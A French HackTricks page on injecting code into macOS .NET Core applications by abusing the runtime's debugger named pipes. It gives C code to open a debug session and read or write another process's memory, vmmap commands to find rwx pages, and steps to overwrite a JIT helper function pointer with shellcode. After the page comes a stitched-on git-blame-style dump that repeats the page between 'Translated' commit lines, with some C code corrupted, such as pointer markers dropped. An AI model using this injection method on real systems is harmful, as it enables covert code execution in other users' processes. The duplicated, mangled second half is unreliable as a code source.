hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md

# Injection dans les applications .Net macOS

<details>

<summary><strong>Apprenez le hacking AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Autres moyens de soutenir HackTricks :

* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Partagez vos astuces de hacking en soumettant des PR aux dépôts github** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Débogage .NET Core <a href="#net-core-debugging" id="net-core-debugging"></a>

### **Établir une session de débogage** <a href="#net-core-debugging" id="net-core-debugging"></a>

[**dbgtransportsession.cpp**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp) est responsable de la gestion de la **communication** entre le débogueur et le débogué.\
Il crée 2 pipes nommés par processus .Net dans [dbgtransportsession.cpp#L127](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L127) en appelant [twowaypipe.cpp#L27](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/debug-pal/unix/twowaypipe.cpp#L27) (l'un se terminera par **`-in`** et l'autre par **`-out`**, et le reste du nom sera le même).

Ainsi, si vous allez dans le **`$TMPDIR`** de l'utilisateur, vous pourrez trouver des **fifos de débogage** que vous pourriez utiliser pour déboguer des applications .Net :

<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

La fonction [**DbgTransportSession::TransportWorker**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L1259) gérera la communication depuis un débogueur.

La première chose qu'un débogueur doit faire est de **créer une nouvelle session de débogage**. Cela se fait en **envoyant un message via le pipe `out`** commençant par une structure `MessageHeader`, que nous pouvons obtenir à partir du code source de .NET :
```c
struct MessageHeader
{
MessageType   m_eType;        // Type of message this is
DWORD         m_cbDataBlock;  // Size of data block that immediately follows this header (can be zero)
DWORD         m_dwId;         // Message ID assigned by the sender of this message
DWORD         m_dwReplyId;    // Message ID that this is a reply to (used by messages such as MT_GetDCB)
DWORD         m_dwLastSeenId; // Message ID last seen by sender (receiver can discard up to here from send queue)
DWORD         m_dwReserved;   // Reserved for future expansion (must be initialized to zero and
// never read)
union {
struct {
DWORD         m_dwMajorVersion;   // Protocol version requested/accepted
DWORD         m_dwMinorVersion;
} VersionInfo;
...
} TypeSpecificData;

BYTE                    m_sMustBeZero[8];
}
```
Dans le cas d'une demande de nouvelle session, cette structure est remplie comme suit :
```c
static const DWORD kCurrentMajorVersion = 2;
static const DWORD kCurrentMinorVersion = 0;

// Set the message type (in this case, we're establishing a session)
sSendHeader.m_eType = MT_SessionRequest;

// Set the version
sSendHeader.TypeSpecificData.VersionInfo.m_dwMajorVersion = kCurrentMajorVersion;
sSendHeader.TypeSpecificData.VersionInfo.m_dwMinorVersion = kCurrentMinorVersion;

// Finally set the number of bytes which follow this header
sSendHeader.m_cbDataBlock = sizeof(SessionRequestData);
```
Une fois construit, nous **envoyons cela à la cible** en utilisant l'appel système `write` :
```c
write(wr, &sSendHeader, sizeof(MessageHeader));
```
Suivant notre en-tête, nous devons envoyer une structure `sessionRequestData`, qui contient un GUID pour identifier notre session :
```c
// All '9' is a GUID.. right??
memset(&sDataBlock.m_sSessionID, 9, sizeof(SessionRequestData));

// Send over the session request data
write(wr, &sDataBlock, sizeof(SessionRequestData));
```
Lors de l'envoi de notre demande de session, nous **lisons à partir du tuyau `out` un en-tête** qui indiquera **si** notre demande d'établir si une session de débogage a été **réussie** ou non :
```c
read(rd, &sReceiveHeader, sizeof(MessageHeader));
```
### Lire la mémoire

Avec une session de débogage établie, il est possible de **lire la mémoire** en utilisant le type de message [`MT_ReadMemory`](https://github.com/dotnet/runtime/blob/f3a45a91441cf938765bafc795cbf4885cad8800/src/coreclr/src/debug/shared/dbgtransportsession.cpp#L1896). Pour lire de la mémoire, le code principal nécessaire serait :
```c
bool readMemory(void *addr, int len, unsigned char **output) {

*output = (unsigned char *)malloc(len);
if (*output == NULL) {
return false;
}

sSendHeader.m_dwId++; // We increment this for each request
sSendHeader.m_dwLastSeenId = sReceiveHeader.m_dwId; // This needs to be set to the ID of our previous response
sSendHeader.m_dwReplyId = sReceiveHeader.m_dwId; // Similar to above, this indicates which ID we are responding to
sSendHeader.m_eType = MT_ReadMemory; // The type of request we are making
sSendHeader.TypeSpecificData.MemoryAccess.m_pbLeftSideBuffer = (PBYTE)addr; // Address to read from
sSendHeader.TypeSpecificData.MemoryAccess.m_cbLeftSideBuffer = len; // Number of bytes to write
sSendHeader.m_cbDataBlock = 0;

// Write the header
if (write(wr, &sSendHeader, sizeof(sSendHeader)) < 0) {
return false;
}

// Read the response header
if (read(rd, &sReceiveHeader, sizeof(sSendHeader)) < 0) {
return false;
}

// Make sure that memory could be read before we attempt to read further
if (sReceiveHeader.TypeSpecificData.MemoryAccess.m_hrResult != 0) {
return false;
}

memset(*output, 0, len);

// Read the memory from the debugee
if (read(rd, *output, sReceiveHeader.m_cbDataBlock) < 0) {
return false;
}

return true;
}
```
Le code de la preuve de concept (POC) est disponible [ici](https://gist.github.com/xpn/95eefc14918998853f6e0ab48d9f7b0b).

### Écrire en mémoire
```c
bool writeMemory(void *addr, int len, unsigned char *input) {

sSendHeader.m_dwId++; // We increment this for each request
sSendHeader.m_dwLastSeenId = sReceiveHeader.m_dwId; // This needs to be set to the ID of our previous response
sSendHeader.m_dwReplyId = sReceiveHeader.m_dwId; // Similar to above, this indicates which ID we are responding to
sSendHeader.m_eType = MT_WriteMemory; // The type of request we are making
sSendHeader.TypeSpecificData.MemoryAccess.m_pbLeftSideBuffer = (PBYTE)addr; // Address to write to
sSendHeader.TypeSpecificData.MemoryAccess.m_cbLeftSideBuffer = len; // Number of bytes to write
sSendHeader.m_cbDataBlock = len;

// Write the header
if (write(wr, &sSendHeader, sizeof(sSendHeader)) < 0) {
return false;
}

// Write the data
if (write(wr, input, len) < 0) {
return false;
}

// Read the response header
if (read(rd, &sReceiveHeader, sizeof(sSendHeader)) < 0) {
return false;
}

// Ensure our memory write was successful
if (sReceiveHeader.TypeSpecificData.MemoryAccess.m_hrResult != 0) {
return false;
}

return true;

}
```
Le code POC utilisé pour cela peut être trouvé [ici](https://gist.github.com/xpn/7c3040a7398808747e158a25745380a5).

### Exécution de code .NET Core <a href="#net-core-code-execution" id="net-core-code-execution"></a>

La première chose est d'identifier par exemple une région de mémoire avec **`rwx`** en cours d'exécution pour sauvegarder le shellcode à exécuter. Cela peut être facilement fait avec :
```bash
vmmap -pages [pid]
vmmap -pages 35829 | grep "rwx/rwx"
```
```markdown
Ensuite, pour déclencher l'exécution, il serait nécessaire de connaître un endroit où un pointeur de fonction est stocké pour l'écraser. Il est possible d'écraser un pointeur dans la **Table de Fonctions Dynamiques (DFT)**, qui est utilisée par l'exécution de .NET Core pour fournir des fonctions d'assistance pour la compilation JIT. Une liste des pointeurs de fonction pris en charge peut être trouvée dans [`jithelpers.h`](https://github.com/dotnet/runtime/blob/6072e4d3a7a2a1493f514cdf4be75a3d56580e84/src/coreclr/src/inc/jithelpers.h).

Dans les versions x64, cela est simple en utilisant la technique de **signature hunting** à la manière de mimikatz pour rechercher dans **`libcorclr.dll`** une référence au symbole **`_hlpDynamicFuncTable`**, que nous pouvons déréférencer :

<figure><img src="../../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>

Il ne reste plus qu'à trouver une adresse à partir de laquelle commencer notre recherche de signature. Pour ce faire, nous utilisons une autre fonction de débogage exposée, **`MT_GetDCB`**. Cela retourne un certain nombre d'informations utiles sur le processus cible, mais dans notre cas, nous sommes intéressés par un champ retourné contenant **l'adresse d'une fonction d'assistance**, **`m_helperRemoteStartAddr`**. En utilisant cette adresse, nous savons juste **où `libcorclr.dll` est situé** dans la mémoire du processus cible et nous pouvons commencer notre recherche de la DFT.

Connaissant cette adresse, il est possible d'écraser le pointeur de fonction avec celui de nos shellcodes.

Le code POC complet utilisé pour injecter dans PowerShell peut être trouvé [ici](https://gist.github.com/xpn/b427998c8b3924ab1d63c89d273734b6).

## Références

* Cette technique a été prise de [https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/](https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/)

<details>

<summary><strong>Apprenez le hacking AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Autres moyens de soutenir HackTricks :

* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Partagez vos astuces de hacking en soumettant des PR aux dépôts github** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
```
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			`# Injection dans les applications .Net macOS`
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00
			`<details>`

Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:53:27 +00:00			`<summary><strong>Apprenez le hacking AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:53:27 +00:00			`Autres moyens de soutenir HackTricks :`

			`* Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop)!`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			`* Obtenez le [merchandising officiel PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:53:27 +00:00			`* Découvrez [La Famille PEASS](https://opensea.io/collection/the-peass-family), notre collection d'[NFTs](https://opensea.io/collection/the-peass-family) exclusifs`
			`* Rejoignez le 💬 [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe telegram](https://t.me/peass) ou suivez moi sur Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Partagez vos astuces de hacking en soumettant des PR aux dépôts github [HackTricks](https://github.com/carlospolop/hacktricks) et [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00
			`</details>`

Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:53:27 +00:00			`## Débogage .NET Core <a href="#net-core-debugging" id="net-core-debugging"></a>`
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00
			`### Établir une session de débogage <a href="#net-core-debugging" id="net-core-debugging"></a>`

Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			`[dbgtransportsession.cpp](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp) est responsable de la gestion de la communication entre le débogueur et le débogué.\`
			Il crée 2 pipes nommés par processus .Net dans [dbgtransportsession.cpp#L127](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L127) en appelant [twowaypipe.cpp#L27](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/debug-pal/unix/twowaypipe.cpp#L27) (l'un se terminera par `-in` et l'autre par `-out`, et le reste du nom sera le même).
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			Ainsi, si vous allez dans le `$TMPDIR` de l'utilisateur, vous pourrez trouver des fifos de débogage que vous pourriez utiliser pour déboguer des applications .Net :
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:53:27 +00:00			`<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>`
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/pentesting 2023-07-31 17:54:19 +00:00			`La fonction [DbgTransportSession::TransportWorker](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L1259) gérera la communication depuis un débogueur.`
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			La première chose qu'un débogueur doit faire est de créer une nouvelle session de débogage. Cela se fait en envoyant un message via le pipe `out` commençant par une structure `MessageHeader`, que nous pouvons obtenir à partir du code source de .NET :
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00			```c
			`struct MessageHeader`
			`{`
			`MessageType m_eType; // Type of message this is`
			`DWORD m_cbDataBlock; // Size of data block that immediately follows this header (can be zero)`
			`DWORD m_dwId; // Message ID assigned by the sender of this message`
			`DWORD m_dwReplyId; // Message ID that this is a reply to (used by messages such as MT_GetDCB)`
			`DWORD m_dwLastSeenId; // Message ID last seen by sender (receiver can discard up to here from send queue)`
			`DWORD m_dwReserved; // Reserved for future expansion (must be initialized to zero and`
			`// never read)`
			`union {`
			`struct {`
			`DWORD m_dwMajorVersion; // Protocol version requested/accepted`
			`DWORD m_dwMinorVersion;`
			`} VersionInfo;`
			`...`
			`} TypeSpecificData;`

			`BYTE m_sMustBeZero[8];`
			`}`
			```
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			`Dans le cas d'une demande de nouvelle session, cette structure est remplie comme suit :`
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00			```c
			`static const DWORD kCurrentMajorVersion = 2;`
			`static const DWORD kCurrentMinorVersion = 0;`

			`// Set the message type (in this case, we're establishing a session)`
			`sSendHeader.m_eType = MT_SessionRequest;`

			`// Set the version`
			`sSendHeader.TypeSpecificData.VersionInfo.m_dwMajorVersion = kCurrentMajorVersion;`
			`sSendHeader.TypeSpecificData.VersionInfo.m_dwMinorVersion = kCurrentMinorVersion;`

			`// Finally set the number of bytes which follow this header`
			`sSendHeader.m_cbDataBlock = sizeof(SessionRequestData);`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:53:27 +00:00			Une fois construit, nous envoyons cela à la cible en utilisant l'appel système `write` :
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00			```c
			`write(wr, &sSendHeader, sizeof(MessageHeader));`
			```
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			Suivant notre en-tête, nous devons envoyer une structure `sessionRequestData`, qui contient un GUID pour identifier notre session :
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00			```c
			`// All '9' is a GUID.. right??`
			`memset(&sDataBlock.m_sSessionID, 9, sizeof(SessionRequestData));`

			`// Send over the session request data`
			`write(wr, &sDataBlock, sizeof(SessionRequestData));`
			```
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			Lors de l'envoi de notre demande de session, nous lisons à partir du tuyau `out` un en-tête qui indiquera si notre demande d'établir si une session de débogage a été réussie ou non :
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00			```c
			`read(rd, &sReceiveHeader, sizeof(MessageHeader));`
			```
			`### Lire la mémoire`

Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			Avec une session de débogage établie, il est possible de lire la mémoire en utilisant le type de message [`MT_ReadMemory`](https://github.com/dotnet/runtime/blob/f3a45a91441cf938765bafc795cbf4885cad8800/src/coreclr/src/debug/shared/dbgtransportsession.cpp#L1896). Pour lire de la mémoire, le code principal nécessaire serait :
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00			```c
			`bool readMemory(void addr, int len, unsigned char *output) {`

			`output = (unsigned char )malloc(len);`
			`if (*output == NULL) {`
			`return false;`
			`}`

			`sSendHeader.m_dwId++; // We increment this for each request`
			`sSendHeader.m_dwLastSeenId = sReceiveHeader.m_dwId; // This needs to be set to the ID of our previous response`
			`sSendHeader.m_dwReplyId = sReceiveHeader.m_dwId; // Similar to above, this indicates which ID we are responding to`
			`sSendHeader.m_eType = MT_ReadMemory; // The type of request we are making`
			`sSendHeader.TypeSpecificData.MemoryAccess.m_pbLeftSideBuffer = (PBYTE)addr; // Address to read from`
			`sSendHeader.TypeSpecificData.MemoryAccess.m_cbLeftSideBuffer = len; // Number of bytes to write`
			`sSendHeader.m_cbDataBlock = 0;`

			`// Write the header`
			`if (write(wr, &sSendHeader, sizeof(sSendHeader)) < 0) {`
			`return false;`
			`}`

			`// Read the response header`
			`if (read(rd, &sReceiveHeader, sizeof(sSendHeader)) < 0) {`
			`return false;`
			`}`

			`// Make sure that memory could be read before we attempt to read further`
			`if (sReceiveHeader.TypeSpecificData.MemoryAccess.m_hrResult != 0) {`
			`return false;`
			`}`

			`memset(*output, 0, len);`

			`// Read the memory from the debugee`
			`if (read(rd, *output, sReceiveHeader.m_cbDataBlock) < 0) {`
			`return false;`
			`}`

			`return true;`
			`}`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:53:27 +00:00			`Le code de la preuve de concept (POC) est disponible [ici](https://gist.github.com/xpn/95eefc14918998853f6e0ab48d9f7b0b).`
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			`### Écrire en mémoire`
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00			```c
			`bool writeMemory(void addr, int len, unsigned char input) {`

			`sSendHeader.m_dwId++; // We increment this for each request`
			`sSendHeader.m_dwLastSeenId = sReceiveHeader.m_dwId; // This needs to be set to the ID of our previous response`
			`sSendHeader.m_dwReplyId = sReceiveHeader.m_dwId; // Similar to above, this indicates which ID we are responding to`
			`sSendHeader.m_eType = MT_WriteMemory; // The type of request we are making`
			`sSendHeader.TypeSpecificData.MemoryAccess.m_pbLeftSideBuffer = (PBYTE)addr; // Address to write to`
			`sSendHeader.TypeSpecificData.MemoryAccess.m_cbLeftSideBuffer = len; // Number of bytes to write`
			`sSendHeader.m_cbDataBlock = len;`

			`// Write the header`
			`if (write(wr, &sSendHeader, sizeof(sSendHeader)) < 0) {`
			`return false;`
			`}`

			`// Write the data`
			`if (write(wr, input, len) < 0) {`
			`return false;`
			`}`

			`// Read the response header`
			`if (read(rd, &sReceiveHeader, sizeof(sSendHeader)) < 0) {`
			`return false;`
			`}`

			`// Ensure our memory write was successful`
			`if (sReceiveHeader.TypeSpecificData.MemoryAccess.m_hrResult != 0) {`
			`return false;`
			`}`

			`return true;`

			`}`
			```
			`Le code POC utilisé pour cela peut être trouvé [ici](https://gist.github.com/xpn/7c3040a7398808747e158a25745380a5).`

			`### Exécution de code .NET Core <a href="#net-core-code-execution" id="net-core-code-execution"></a>`

Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			La première chose est d'identifier par exemple une région de mémoire avec `rwx` en cours d'exécution pour sauvegarder le shellcode à exécuter. Cela peut être facilement fait avec :
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00			```bash
			`vmmap -pages [pid]`
			`vmmap -pages 35829 \| grep "rwx/rwx"`
			```
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			```markdown
			Ensuite, pour déclencher l'exécution, il serait nécessaire de connaître un endroit où un pointeur de fonction est stocké pour l'écraser. Il est possible d'écraser un pointeur dans la Table de Fonctions Dynamiques (DFT), qui est utilisée par l'exécution de .NET Core pour fournir des fonctions d'assistance pour la compilation JIT. Une liste des pointeurs de fonction pris en charge peut être trouvée dans [`jithelpers.h`](https://github.com/dotnet/runtime/blob/6072e4d3a7a2a1493f514cdf4be75a3d56580e84/src/coreclr/src/inc/jithelpers.h).
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			Dans les versions x64, cela est simple en utilisant la technique de signature hunting à la manière de mimikatz pour rechercher dans `libcorclr.dll` une référence au symbole `_hlpDynamicFuncTable`, que nous pouvons déréférencer :
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/pentesting 2023-07-31 17:54:19 +00:00			`<figure><img src="../../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>`
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:53:27 +00:00			Il ne reste plus qu'à trouver une adresse à partir de laquelle commencer notre recherche de signature. Pour ce faire, nous utilisons une autre fonction de débogage exposée, `MT_GetDCB`. Cela retourne un certain nombre d'informations utiles sur le processus cible, mais dans notre cas, nous sommes intéressés par un champ retourné contenant l'adresse d'une fonction d'assistance, `m_helperRemoteStartAddr`. En utilisant cette adresse, nous savons juste où `libcorclr.dll` est situé dans la mémoire du processus cible et nous pouvons commencer notre recherche de la DFT.
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			`Connaissant cette adresse, il est possible d'écraser le pointeur de fonction avec celui de nos shellcodes.`
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:53:27 +00:00			`Le code POC complet utilisé pour injecter dans PowerShell peut être trouvé [ici](https://gist.github.com/xpn/b427998c8b3924ab1d63c89d273734b6).`
Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md', 2023-06-25 23:30:13 +00:00
			`## Références`

Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			`* Cette technique a été prise de [https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/](https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/)`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-06-26 19:16:29 +00:00
			`<details>`

Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:53:27 +00:00			`<summary><strong>Apprenez le hacking AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-06-26 19:16:29 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:53:27 +00:00			`Autres moyens de soutenir HackTricks :`

			`* Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop)!`
			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			`* Découvrez [La Famille PEASS](https://opensea.io/collection/the-peass-family), notre collection d'[NFTs](https://opensea.io/collection/the-peass-family) exclusifs`
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:53:27 +00:00			`* Rejoignez le 💬 [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe telegram](https://t.me/peass) ou suivez moi sur Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Partagez vos astuces de hacking en soumettant des PR aux dépôts github [HackTricks](https://github.com/carlospolop/hacktricks) et [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-06-26 19:16:29 +00:00
			`</details>`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:10:49 +00:00			```